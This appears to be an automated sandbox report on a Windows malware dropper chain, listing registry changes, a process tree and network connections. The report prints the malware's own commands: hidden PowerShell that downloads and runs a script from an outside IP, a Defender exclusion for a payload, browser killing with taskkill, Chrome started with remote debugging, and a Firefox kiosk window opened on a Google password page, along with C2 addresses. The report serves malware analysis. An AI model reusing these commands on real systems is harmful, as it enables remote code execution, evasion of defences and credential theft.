Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe
"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {30FCB4AD-7091-4EEA-9D54-B36AFCC25BC4} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
C:\ProgramData\kplnh\nvwjc.exe
C:\ProgramData\kplnh\nvwjc.exe
C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 500
C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1028
C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188
C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F90E.tmp\F90F.tmp\F910.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\QanWmXjd\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe
"C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 1220
C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1020
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f69758,0x7fef6f69768,0x7fef6f69778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1944 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1336 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1200
C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe
"C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nop8" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe
"C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.0.1296375672\1433213446" -parentBuildID 20221007134813 -prefsHandle 1132 -prefMapHandle 1124 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f483df3f-b1a4-4423-b49d-69e0062c0cc8} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1316 101f0158 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.1.256581804\1545010702" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5e4eda8-9824-4bfb-9ea5-043b9bf01f7c} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1564 43eb558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.2.1412349720\247694493" -childID 1 -isForBrowser -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a69bac0-4b15-49c6-aa05-a11402ae1fca} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2088 1015f358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.3.667336605\570302175" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebff203-e8dc-4de1-96ef-3c6e6d4f970b} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2652 1cea4958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.4.271526683\1969280333" -childID 3 -isForBrowser -prefsHandle 3864 -prefMapHandle 3860 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3abba5e3-6a00-4f35-ac60-e899e86a146e} 948 "\\.\pipe\gecko-crash-server-pipe.948" 3912 1fbb2a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.5.678688496\1769326617" -childID 4 -isForBrowser -prefsHandle 4020 -prefMapHandle 4024 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c9037f0-c1d0-4a33-80d8-a7360110c749} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4008 1fcc7358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.6.1788730289\2049257363" -childID 5 -isForBrowser -prefsHandle 4184 -prefMapHandle 4188 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3201214d-8736-4275-b124-7da9daf25f25} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4172 1fcc7f58 tab
C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe
"C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| NL | 45.154.98.175:6969 | tcp | |
